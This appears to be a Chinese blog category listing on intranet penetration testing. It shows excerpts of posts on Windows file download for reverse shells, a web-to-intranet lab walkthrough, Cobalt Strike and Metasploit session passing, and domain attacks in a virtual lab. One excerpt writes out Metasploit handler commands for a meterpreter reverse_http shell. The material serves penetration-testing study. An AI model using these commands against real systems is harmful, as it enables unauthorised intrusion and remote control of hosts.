![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
内网渗透
文章平均质量分 71
super 硕
一名专注于分享web安全的小白帽
展开
-
后渗透系列之windows文件下载
在遇到目标服务器是windows服务器时,此篇文章能帮到你windows如何在命令行下面下载文件达到反弹shell的效果原创 2022-07-11 10:24:48 · 1427 阅读 · 0 评论 -
记一次从web到内网的渗透
记一次从web到内网的渗透拓扑图环境介绍现在有三台机器,分别为target1,target2,target3,里面分别有三个flag,每个flag的分值不同,需要通过拿下一个已知IP(target1)进而向内网里面进行渗透,最终要成功获得三台主机权限渗透过程target1使用nmap进行扫描可以看到开启了80端口浏览器访问目标靶机80端口可以看到就是apache的默认页面使用dirb进行目录结构扫描发现public页面可以看到是thinkphp5搭建的网站,thinkphp原创 2021-09-28 22:22:15 · 4676 阅读 · 7 评论 -
CS&MSF联动
CS&MSF联动CS联动MSF现在CS这边已经成功上线一台主机,需要将这个会话传入MSFCS这边新建一个监听器然后打开MSFuse exploit/multi/handlerset payload windows/meterpreter/reverse_http #需要设置成CS一样的payloadset lhost 192.168.109.128set lport 5566 #需要设置成跟CS一样的端口然后CS这边选择增加会话然后指定生成的msf监听器即可可以看原创 2021-09-23 13:24:52 · 354 阅读 · 0 评论 -
使用CS进行域渗透
使用CS进行域渗透实验拓扑实验环境kali:NAT模式(192.168.109.128)win7:网卡1:VMNET2模式,连接内网(10.1.1.150)网卡2:NAT模式,连接外网(192.168.109.162)win2003:VMNET2模式,为内网主机(10.1.1.200)winserver2008:WMNET2模式,为内网主机(10.1.1.100)首先需要将winserver2008部署为域控服务器,然后让win7和win2003加入该域winserver2008部署域原创 2021-08-17 22:14:26 · 1826 阅读 · 0 评论